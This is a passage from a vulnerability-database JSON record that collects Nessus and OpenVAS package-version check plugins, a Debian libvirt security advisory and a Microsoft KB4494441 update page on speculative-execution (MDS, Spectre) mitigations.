value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-1000407\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:1170\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:1170\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", reference:\"kernel-abi-whitelists-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", reference:\"kernel-doc-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-08-15T14:41:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-08-15T00:00:00", "published": "2019-06-24T00:00:00", "id": "OPENVAS:1361412562310704469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704469", "title": "Debian Security Advisory DSA 4469-1 (libvirt - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704469\");\n script_version(\"2019-08-15T09:18:49+0000\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-3639\", \"CVE-2019-10161\", \"CVE-2019-10167\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-15 09:18:49 +0000 (Thu, 15 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-24 02:00:21 +0000 (Mon, 24 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4469-1 (libvirt - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4469.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4469-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvirt'\n package(s) announced via the DSA-4469-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt's cpu map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130 and CVE-2019-11091\neasier by supporting the md-clear, ssbd, spec-ctrl\nand ibpb CPU features when picking CPU models without having to fall\nback to host-passthrough.\");\n\n script_tag(name:\"affected\", value:\"'libvirt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 3.0.0-4+deb9u4.\n\nWe recommend that you upgrade your libvirt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-libvirt\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-clients\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-daemon\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-daemon-system\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-dev\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-doc\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-sanlock\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt0\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the\n ", "modified": "2019-05-22T00:00:00", "published": "2019-05-21T00:00:00", "id": "OPENVAS:1361412562310876390", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876390", "title": "Fedora Update for qemu FEDORA-2019-6e146a714c", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876390\");\n script_version(\"2019-05-22T11:13:26+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\",\n \"CVE-2017-16845\", \"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 11:13:26 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-21 02:10:44 +0000 (Tue, 21 May 2019)\");\n script_name(\"Fedora Update for qemu FEDORA-2019-6e146a714c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6e146a714c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AILCHEKSBI6BWPSUUBLIH7H7VULOXJXL\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'qemu' package(s) announced via the FEDORA-2019-6e146a714c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"QEMU is a generic and open source processor\n emulator which achieves a good emulation speed by using dynamic translation.\n QEMU has two operating modes:\n\n * Full system emulation. In this mode, QEMU emulates a full system (for\n example a PC), including a processor and various peripherals. It can be\n used to launch different Operating Systems without rebooting the PC or\n to debug system code.\n\n * User mode emulation. In this mode, QEMU can launch Linux processes compiled\n for one CPU on another CPU.\n\nAs QEMU requires no host kernel patches to run, it is safe and easy to use.\");\n\n script_tag(name:\"affected\", value:\"'qemu' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"qemu\", rpm:\"qemu~2.11.2~5.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-08-09T14:27:15", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4469-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 22, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libvirt\nCVE ID : CVE-2019-10161 CVE-2019-10167\n\nTwo vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt&#x27;s cpu map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126,\nCVE-2018-12127, CVE-2018-12130 and CVE-2019-11091 easier by supporting\nthe md-clear, ssbd, spec-ctrl and ibpb CPU features when picking CPU\nmodels without having to fall back to host-passthrough.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 3.0.0-4+deb9u4.\n\nWe recommend that you upgrade your libvirt packages.\n\nFor the detailed security status of libvirt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/libvirt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2019-06-22T16:56:03", "published": "2019-06-22T16:56:03", "id": "DEBIAN:DSA-4469-1:B9B08", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00116.html", "title": "[SECURITY] [DSA 4469-1] libvirt security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-11-16T10:17:54", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4494441, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Note</p><div class=\"row\"><div class=\"col-xs-24\"><p><span>This release also contains updates for Microsoft HoloLens (OS Build 17763.502) released May 14, 2019.</span></p><p>Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.</p></div></div></div></div><h2>Improvements and fixes</h2><div><p>This update includes quality improvements.\u00a0 Key changes include:</p><ul><li>Enables \u201cRetpoline\u201d by default if Spectre Variant 2 (<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv180002\" managed-link=\"\" target=\"_blank\">CVE-2017-5715</a>) is enabled. Make sure previous OS protections against the Spectre Variant 2 vulnerability are enabled using the registry settings described in the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in\" managed-link=\"\" target=\"_blank\">Windows Client</a> and <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\" managed-link=\"\" target=\"_blank\">Windows Server</a>\u00a0articles. (<span><span>These registry settings are enabled by default for Windows Client OS editions, but disabled by default for Windows Server OS editions).</span></span> <span><span>For more information about \u201cRetpoline\u201d,</span></span> <span><span>see</span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Mitigating-Spectre-variant-2-with-Retpoline-on-Windows/ba-p/295618\" managed-link=\"\" target=\"_blank\">Mitigating Spectre variant 2 with Retpoline on Windows</a>.</li><li>Provides protections against a new subclass of speculative execution side-channel vulnerabilities, known as <em>Microarchitectural Data Sampling</em>, for 64-Bit (x64) versions of Windows (<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2019-11091</a>,<a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\"> CVE-2018-12126</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12127</a>, <a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/{lang-locale}/security-guidance/advisory/adv190013\" managed-link=\"\" target=\"_blank\">CVE-2018-12130</a>). Use the registry settings as described in the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4073119/protect-against-speculative-execution-side-channel-vulnerabilities-in\" managed-link=\"\" target=\"_blank\">Windows Client</a> and <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/{lang-locale}/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities-prot\" managed-link=\"\" target=\"_blank\">Windows Server</a>\u00a0articles<em>. </em>(<span><span>These registry settings are enabled by default for Windows Client OS editions and Windows Server OS editions).</span></span></li><li>Adds \"gov.uk\" to the HTTP Strict Transport Security Top Level Domains (HSTS TLD) for Internet Explorer and Microsoft Edge.</li><li>Addresses an issue that may cause \u201cError 1309\u201d while installing or uninstalling certain types of .msi and .msp files on a virtual drive.</li><li>Addresses an issue that prevents the Microsoft Visual Studio Simulator from starting.</li><li>Addresses an issue that may cause zone transfers between primary and secondary DNS servers over the Transmission Control Protocol (TCP) to fail.</li><li><span><span>Addresses an issue that causes Simple Network Management Protocol (SNMP) Management Information Base registration to fail when the Windows Management Instrumentation (WMI) provider uses the Windows tool <strong>SMI2SMIR.exe</strong></span></span><strong>.</strong></li><li>Addresses an issue that may cause the text, layout, or cell size to become narrower or wider than expected in Microsoft Excel when using the <strong>MS UI Gothic </strong>or <strong>MS PGothic </strong>fonts.\u00a0</li><li>Security updates to Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Graphics, Windows Storage and Filesystems, Windows Cryptography, the Microsoft JET Database Engine, Windows Kernel, Windows Virtualization, and Windows Server .</li></ul><p>If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.</p><p><span><span><span><span>For more information about the resolved security vulnerabilities, please refer to the </span></span></span></span><span><span><span><a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/security-guidance\" managed-link=\"\" target=\"_blank\">Security Update Guide</a>.</span></span></span></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Windows Update Improvements</p><div class=\"row\"><div class=\"col-xs-24\"><p>Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.</p></div></div></div></div></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>After installing this update, there may be issues using the Preboot Execution Environment (PXE) to start a device from a Windows Deployment Services (WDS) server configured to use Variable Window Extension. This may cause the connection to the WDS server to terminate prematurely while downloading the image. This issue does not affect clients or devices that are not using Variable Window Extension.</td><td><p>This issue is resolved in <a data-content-id=\"4503327\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4503327</a>.</p></td></tr><tr><td>Certain operations, such as <strong>rename</strong>, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.</td><td><p>Do one of the following:</p><ul><li>Perform the operation from a process that has administrator privilege.</li><li>Perform the operation from a node that doesn\u2019t have CSV ownership.</li></ul>Microsoft is working on a resolution and will provide an update in an upcoming release.</td></tr><tr><td>When attempting to print from Microsoft Edge or other Universal Windows Platform (UWP) applications, you may receive the error, \"Your printer has experienced an unexpected configuration problem. 0x80070007e.\"</td><td><p>This issue is resolved in <a data-content-id=\"4501371\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4501371</a>.</p></td></tr><tr><td>After installing <a data-content-id=\"4493509\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4493509</a>, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"</td><td><ol><li>Uninstall and reinstall any recently added language packs. For instructions, see <a data-content-id=\"4496404\" data-content-type=\"article\" href=\"\" managed-link=\"\">Manage the input and display language settings in Windows 10</a>.</li><li>Select\u00a0<strong>Check for Updates</strong> and install the April 2019 Cumulative Update. For instructions, see <a data-content-id=\"4027667\" data-content-type=\"ia\" href=\"\" managed-link=\"\">Update Windows 10</a>.</li></ol><p class=\"indent-2\"><strong>Note</strong> If reinstalling the language pack does not mitigate the issue, reset your PC as follows:</p><ol><li class=\"indent-2\">Go to the <strong>Settings </strong>app &gt; <strong>Recovery</strong>.</li><li class=\"indent-2\">Select <strong>Get Started</strong> under the <strong>Reset this PC</strong> recovery option.</li><li class=\"indent-2\">Select <strong>Keep my Files</strong>.</li></ol><p>Microsoft is working on a resolution and will provide an update in an upcoming release.</p></td></tr><tr><td><p>Some customers report\u00a0that KB4494441 installed twice on their device.<strong><span><span><span>\u00a0</span></span></span></strong></p><p><span><span><span>In certain situations, installing an update requires multiple download and restart steps. If two intermediate steps of the installation complete successfully, the <strong>View your Update history</strong> page will report that installation completed successfully twice. </span></span></span></p></td><td><p><span><span><span>No action is required on your part. The update installation may take longer and may require more than one restart, but will install successfully after all intermediate installation steps have completed. </span></span></span></p><p><span><span><span>We are working on improving this update experience to ensure the <strong>Update history</strong> correctly reflects the installation of the latest cumulative update (LCU).</span></span></span></p></td></tr><tr><td>After installing the May 14, 2019 update, some gov.uk websites that don\u2019t support HTTP Strict Transport Security (HSTS) may not be accessible through Internet Explorer 11 or Microsoft Edge.</td><td>This issue is resolved in <a data-content-id=\"4505056\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4505056</a>.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p><strong>Before installing this update</strong></p><p><strong>Prerequisite: </strong>The servicing stack update (SSU) (<a data-content-id=\"4499728\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4499728</a>) must be installed before installing the latest cumulative update (LCU). The\u00a0LCU will not be reported as applicable until the SSU is installed.\u00a0For more information, see\u00a0<a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Servicing stack updates</a>.</p><p>If you are using Windows Update, the latest SSU (<a data-content-id=\"4499728\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4499728</a>) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the <a data-content-id=\"\" data-content-type=\"\" 